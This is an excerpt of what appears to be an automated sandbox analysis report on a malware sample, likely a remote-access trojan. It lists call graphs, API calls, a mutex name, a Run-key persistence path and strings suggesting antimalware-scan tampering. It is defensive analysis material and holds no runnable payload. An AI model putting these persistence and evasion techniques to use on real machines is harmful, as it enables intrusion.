2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4698 * 2 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 ExitProcess 9767->9901 9902 2e06cdd-2e06cec call 2de48b0 9767->9902 10468 2e069b6-2e069b9 9768->10468 10469 2e069bb-2e06b4f call 2de49bc call 2dfc5bc call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 EnumSystemLocalesA 9768->10469 9902->9901 9914 2e06cf2-2e06fc5 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfd198 call 2de4824 call 2de4964 call 2de4698 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de7e18 9902->9914 10238 2e072a2-2e074a3 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de49bc call 2df7f48 9914->10238 10239 2e06fcb-2e0729d call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2dfc74c call 2de44f4 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4824 call 2de4964 call 2de4698 call 2de47b0 call 2de4964 call 2de4698 call 2df7be8 call 2de4da4 * 2 call 2de4728 call 2dfc3f8 9914->10239 10212->10213 10238->9901 10239->10238 10468->10469 10469->9767
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                      • Part of subcall function 02DFD318: RegOpenKeyA.ADVAPI32(?,00000000,02E45798), ref: 02DFD35C
                                                                                                                                                      • Part of subcall function 02DFD318: RegSetValueExA.ADVAPI32(000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD394
                                                                                                                                                      • Part of subcall function 02DFD318: RegCloseKey.ADVAPI32(000008A8,000008A8,00000000,00000000,00000001,00000000,0000001C,00000000,02DFD3C7), ref: 02DFD39F
                                                                                                                                                    • WinExec.KERNEL32(00000000,00000000), ref: 02E057F9
                                                                                                                                                      • Part of subcall function 02DF9E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 02DF9F33
                                                                                                                                                    • RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,02E45344,02E08FEC,UacScan,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC,OpenSession,02E45344,02E08FEC), ref: 02E05D7B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                                                    • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                                                    • API String ID: 897696978-872072817
                                                                                                                                                    • Opcode ID: b1c08c4d39796d7dfefae5bef9693ef178fcf383fde1d62daec2743214fe5464
                                                                                                                                                    • Instruction ID: 3a048c3e40dff5e15ad9a4f9a3c72df632a739d09a7e8b217704a532cc923964
                                                                                                                                                    • Opcode Fuzzy Hash: b1c08c4d39796d7dfefae5bef9693ef178fcf383fde1d62daec2743214fe5464
                                                                                                                                                    • Instruction Fuzzy Hash: 5992F734A802988BDF10FB65DC809DD73B7EB85700F5085E5A64AEB354DA70AEC2CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 11350 1568da34-1568da59 call 15681f86 11353 1568da5f 11350->11353 11354 1568db83-1568dba9 call 15681f04 GetLongPathNameW call 1568417e 11350->11354 11355 1568db58-1568db5d 11353->11355 11356 1568da9b-1568daa0 11353->11356 11357 1568db6e 11353->11357 11358 1568db5f-1568db6c call 156bc0cf 11353->11358 11359 1568da70-1568da7e call 1569b5b4 call 15681f13 11353->11359 11360 1568da91-1568da96 11353->11360 11361 1568db51-1568db56 11353->11361 11362 1568daa5-1568daac call 1569bfb7 11353->11362 11363 1568da66-1568da6b 11353->11363 11380 1568dbae-1568dc1b call 1568417e call 1568ddd1 call 15682fa5 * 2 call 15681f09 * 5 11354->11380 11365 1568db73-1568db78 call 156bc0cf 11355->11365 11356->11365 11357->11365 11358->11357 11377 1568db79-1568db7e call 15689057 11358->11377 11383 1568da83 11359->11383 11360->11365 11361->11365 11375 1568daae-1568dafe call 1568417e call 156bc0cf call 1568417e call 15682fa5 call 15681f13 call 15681f09 * 2 11362->11375 11376 1568db00-1568db4c call 1568417e call 156bc0cf call 1568417e call 15682fa5 call 15681f13 call 15681f09 * 2 11362->11376 11363->11365 11365->11377 11389 1568da87-1568da8c call 15681f09 11375->11389 11376->11383 11377->11354 11383->11389 11389->11354
                                                                                                                                                    APIs
                                                                                                                                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 1568DB9A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongNamePath
                                                                                                                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                    • API String ID: 82841172-425784914
                                                                                                                                                    • Opcode ID: bb82fce8033ad485a25ae5aaeae8dc0ff0b7d1424d6d0a4168b1fb43be836610
                                                                                                                                                    • Instruction ID: 4812d4c43d53474cf0704fb3de1623567235b5dad1bdc6e83686ceae2dd5c863
                                                                                                                                                    • Opcode Fuzzy Hash: bb82fce8033ad485a25ae5aaeae8dc0ff0b7d1424d6d0a4168b1fb43be836610
                                                                                                                                                    • Instruction Fuzzy Hash: F341347520A3419BD314DB60EC50CAFB3F9AEA0255F10061DF446921A4FF70BE49C6EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 11432 1569b2c3-1569b31a call 1569bfb7 call 156935a6 call 15681fe2 call 15681fd8 call 15686ae1 11443 1569b35d-1569b366 11432->11443 11444 1569b31c-1569b32b call 156935a6 11432->11444 11445 1569b368-1569b36d 11443->11445 11446 1569b36f 11443->11446 11449 1569b330-1569b347 call 15681fab StrToIntA 11444->11449 11448 1569b374-1569b37f call 1568537d 11445->11448 11446->11448 11454 1569b349-1569b352 call 1569cf69 11449->11454 11455 1569b355-1569b358 call 15681fd8 11449->11455 11454->11455 11455->11443
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1569BFB7: GetCurrentProcess.KERNEL32(?,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFC8
                                                                                                                                                      • Part of subcall function 1569BFB7: IsWow64Process.KERNEL32(00000000,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFCF
                                                                                                                                                      • Part of subcall function 156935A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 156935CA
                                                                                                                                                      • Part of subcall function 156935A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 156935E7
                                                                                                                                                      • Part of subcall function 156935A6: RegCloseKey.ADVAPI32(?), ref: 156935F2
                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,156EC9F8,00000000,00000000,00000000,156F50E4,00000003,Exe,00000000,0000000E,00000000,156E60BC,00000003,00000000), ref: 1569B33C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                    • API String ID: 782494840-2070987746
                                                                                                                                                    • Opcode ID: 0b65bd4223e4606baf54e18a9ea8a277d2543551168cea7077005c0fd3751ca2
                                                                                                                                                    • Instruction ID: ca8f0627864e48f6322c677be233e610e663f76e4d461bce5b9f8062c6a8f747
                                                                                                                                                    • Opcode Fuzzy Hash: 0b65bd4223e4606baf54e18a9ea8a277d2543551168cea7077005c0fd3751ca2
                                                                                                                                                    • Instruction Fuzzy Hash: CE112970B0B2449ED708E264CC95DBF7759DB54110F940219E506A32D5EE607C41C3F9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 11459 2de1724-2de1736 11460 2de173c-2de174c 11459->11460 11461 2de1968-2de196d 11459->11461 11462 2de174e-2de175b 11460->11462 11463 2de17a4-2de17ad 11460->11463 11464 2de1973-2de1984 11461->11464 11465 2de1a80-2de1a83 11461->11465 11466 2de175d-2de176a 11462->11466 11467 2de1774-2de1780 11462->11467 11463->11462 11470 2de17af-2de17bb 11463->11470 11468 2de1938-2de1945 11464->11468 11469 2de1986-2de19a2 11464->11469 11471 2de1a89-2de1a8b 11465->11471 11472 2de1684-2de16ad VirtualAlloc 11465->11472 11475 2de176c-2de1770 11466->11475 11476 2de1794-2de17a1 11466->11476 11478 2de1782-2de1790 11467->11478 11479 2de17f0-2de17f9 11467->11479 11468->11469 11477 2de1947-2de195b Sleep 11468->11477 11480 2de19a4-2de19ac 11469->11480 11481 2de19b0-2de19bf 11469->11481 11470->11462 11482 2de17bd-2de17c9 11470->11482 11473 2de16df-2de16e5 11472->11473 11474 2de16af-2de16dc call 2de1644 11472->11474 11474->11473 11477->11469 11486 2de195d-2de1964 Sleep 11477->11486 11483 2de182c-2de1836 11479->11483 11484 2de17fb-2de1808 11479->11484 11487 2de1a0c-2de1a22 11480->11487 11488 2de19d8-2de19e0 11481->11488 11489 2de19c1-2de19d5 11481->11489 11482->11462 11490 2de17cb-2de17de Sleep 11482->11490 11494 2de18a8-2de18b4 11483->11494 11495 2de1838-2de1863 11483->11495 11484->11483 11493 2de180a-2de181e Sleep 11484->11493 11486->11468 11496 2de1a3b-2de1a47 11487->11496 11497 2de1a24-2de1a32 11487->11497 11491 2de19fc-2de19fe call 2de15cc 11488->11491 11492 2de19e2-2de19fa 11488->11492 11489->11487 11490->11462 11499 2de17e4-2de17eb Sleep 11490->11499 11500 2de1a03-2de1a0b 11491->11500 11492->11500 11493->11483 11502 2de1820-2de1827 Sleep 11493->11502 11508 2de18dc-2de18eb call 2de15cc 11494->11508 11509 2de18b6-2de18c8 11494->11509 11503 2de187c-2de188a 11495->11503 11504 2de1865-2de1873 11495->11504 11506 2de1a68 11496->11506 11507 2de1a49-2de1a5c 11496->11507 11497->11496 11505 2de1a34 11497->11505 11499->11463 11502->11484 11512 2de188c-2de18a6 call 2de1500 11503->11512 11513 2de18f8 11503->11513 11504->11503 11511 2de1875 11504->11511 11505->11496 11515 2de1a6d-2de1a7f 11506->11515 11514 2de1a5e-2de1a63 call 2de1500 11507->11514 11507->11515 11518 2de18fd-2de1936 11508->11518 11522 2de18ed-2de18f7 11508->11522 11516 2de18cc-2de18da 11509->11516 11517 2de18ca 11509->11517 11511->11503 11512->11518 11513->11518 11514->11515 11516->11518 11517->11516
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,02DE1FC1), ref: 02DE17D0
                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,02DE1FC1), ref: 02DE17E6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 96cd6641ca24742694fb500ba181194fcd8a048ea7f11556e9be1fbe9efbc034
                                                                                                                                                    • Instruction ID: f41130d2388ee8869adfd34281582d9683798206558ba329ff362ecd52de0c9f
                                                                                                                                                    • Opcode Fuzzy Hash: 96cd6641ca24742694fb500ba181194fcd8a048ea7f11556e9be1fbe9efbc034
                                                                                                                                                    • Instruction Fuzzy Hash: 94B14576B402518BCF15EF29D8C4765BBE1EB84314F48866DE95E8B385C770DC92CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF7B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45librarymemoryloaderCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02DF7BA5,?,?,00000000,00000000), ref: 02DF7B61
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02DF7B67
                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02DF7BA5,?,?,00000000,00000000), ref: 02DF7B81
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                    • String ID: irtualProtect$kernel32
                                                                                                                                                    • API String ID: 2099061454-2063912171
                                                                                                                                                    • Opcode ID: e6037e3024891b24642634a06097b4a60af973a6c0a74dc4430d653d7049d1da
                                                                                                                                                    • Instruction ID: a4579225a70d28f4d3b74da8f2cf34315d9271b779e9e9df97bcfabf1b501d39
                                                                                                                                                    • Opcode Fuzzy Hash: e6037e3024891b24642634a06097b4a60af973a6c0a74dc4430d653d7049d1da
                                                                                                                                                    • Instruction Fuzzy Hash: CC012C75640248AFFB40FFA4EC51E9EB7EDEB49710F914854FA05E3740D670EE118A68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 11538 2de1a8c-2de1a9b 11539 2de1b6c-2de1b6f 11538->11539 11540 2de1aa1-2de1aa5 11538->11540 11541 2de1c5c-2de1c60 11539->11541 11542 2de1b75-2de1b7f 11539->11542 11543 2de1b08-2de1b11 11540->11543 11544 2de1aa7-2de1aae 11540->11544 11550 2de16e8-2de170b call 2de1644 VirtualFree 11541->11550 11551 2de1c66-2de1c6b 11541->11551 11546 2de1b3c-2de1b49 11542->11546 11547 2de1b81-2de1b8d 11542->11547 11543->11544 11545 2de1b13-2de1b27 Sleep 11543->11545 11548 2de1adc-2de1ade 11544->11548 11549 2de1ab0-2de1abb 11544->11549 11545->11544 11552 2de1b2d-2de1b38 Sleep 11545->11552 11546->11547 11554 2de1b4b-2de1b5f Sleep 11546->11554 11555 2de1b8f-2de1b92 11547->11555 11556 2de1bc4-2de1bd2 11547->11556 11559 2de1af3 11548->11559 11560 2de1ae0-2de1af1 11548->11560 11557 2de1abd-2de1ac2 11549->11557 11558 2de1ac4-2de1ad9 11549->11558 11567 2de170d-2de1714 11550->11567 11568 2de1716 11550->11568 11552->11543 11554->11547 11565 2de1b61-2de1b68 Sleep 11554->11565 11562 2de1b96-2de1b9a 11555->11562 11556->11562 11563 2de1bd4-2de1bd9 call 2de14c0 11556->11563 11561 2de1af6-2de1b03 11559->11561 11560->11559 11560->11561 11561->11542 11569 2de1bdc-2de1be9 11562->11569 11570 2de1b9c-2de1ba2 11562->11570 11563->11562 11565->11546 11573 2de1719-2de1723 11567->11573 11568->11573 11569->11570 11572 2de1beb-2de1bf2 call 2de14c0 11569->11572 11574 2de1bf4-2de1bfe 11570->11574 11575 2de1ba4-2de1bc2 call 2de1500 11570->11575 11572->11570 11577 2de1c2c-2de1c59 call 2de1560 11574->11577 11578 2de1c00-2de1c28 VirtualFree 11574->11578
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000,?), ref: 02DE1B17
                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?), ref: 02DE1B31
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 41ecb9e1d99c080176709bc9e48d279fcdbdd56f319519559a083496ed435d88
                                                                                                                                                    • Instruction ID: a8c4a14c5625e9f6fdae4414b20b364731e295886b04b793d851184b6b70bfd5
                                                                                                                                                    • Opcode Fuzzy Hash: 41ecb9e1d99c080176709bc9e48d279fcdbdd56f319519559a083496ed435d88
                                                                                                                                                    • Instruction Fuzzy Hash: 4D51C1757442408FDB15EF68C984766BBD0EF46314F5881AEE94ACB382D770DC86CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DFC8AA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DFC9EA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                                                    • Opcode ID: 699b1bf20109af272e11ab23182dc5164936c86ba4d58bfcf21baa7df7555da7
                                                                                                                                                    • Instruction ID: 7f23c2445462e368c25b6d237c3f9a7954a2f0f174f90d0fb67d3d0537970ac8
                                                                                                                                                    • Opcode Fuzzy Hash: 699b1bf20109af272e11ab23182dc5164936c86ba4d58bfcf21baa7df7555da7
                                                                                                                                                    • Instruction Fuzzy Hash: 0F412C31B602489BEF10FBA4D881ADEB3FAEF48714F614466E602B7340DA70AD158F64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15693814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 1569381F
                                                                                                                                                    • RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,156F52D8,755737E0,?), ref: 1569384D
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,156F52D8,755737E0,?,?,?,?,?,1568CFAA,?,00000000), ref: 15693858
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 1569381D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                    • API String ID: 1818849710-1051519024
                                                                                                                                                    • Opcode ID: f1d5655ce68c01dbd47e05c31937e01679cab3ecf5e30093ca80cdc331c10224
                                                                                                                                                    • Instruction ID: 839dabda8ee3d3ac038d7743d80dd75f79e4a71ee9a8d174849c8456d29c3d23
                                                                                                                                                    • Opcode Fuzzy Hash: f1d5655ce68c01dbd47e05c31937e01679cab3ecf5e30093ca80cdc331c10224
                                                                                                                                                    • Instruction Fuzzy Hash: 2FF06D71A5122CFFDF109FA1EC45FEA376DEF04665F108519FC0596150EB31AA04DAE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,1568EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,156E60BC,00000003,00000000), ref: 1568D078
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1568D083
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                                                    • String ID: Rmc-VLI916
                                                                                                                                                    • API String ID: 1925916568-2161943253
                                                                                                                                                    • Opcode ID: 6df144e85cb5b7d1fd3e843403b1790334efde4de72030d1f558e37c0e29fc3f
                                                                                                                                                    • Instruction ID: dd6223487406944d71b939ba5828c0b9db9fb0ba233a9c60a87fdfa365c71f46
                                                                                                                                                    • Opcode Fuzzy Hash: 6df144e85cb5b7d1fd3e843403b1790334efde4de72030d1f558e37c0e29fc3f
                                                                                                                                                    • Instruction Fuzzy Hash: 3ED012B5B352149BD7181B7488E975C39A99744711F80081DF447D59C0DF744890CAD1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF5BE8 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DF5D30,?,?,02DF38BC,00000001), ref: 02DF5C44
                                                                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DF5D30,?,?,02DF38BC,00000001), ref: 02DF5C72
                                                                                                                                                      • Part of subcall function 02DE7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02DF38BC,02DF5CB2,00000000,02DF5D30,?,?,02DF38BC), ref: 02DE7D66
                                                                                                                                                      • Part of subcall function 02DE7F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02DF38BC,02DF5CCD,00000000,02DF5D30,?,?,02DF38BC,00000001), ref: 02DE7F73
                                                                                                                                                    • GetLastError.KERNEL32(00000000,02DF5D30,?,?,02DF38BC,00000001), ref: 02DF5CD7
                                                                                                                                                      • Part of subcall function 02DEA734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02DEC395,00000000,02DEC3EF), ref: 02DEA753
                                                                                                                                                    Memory Dump Source
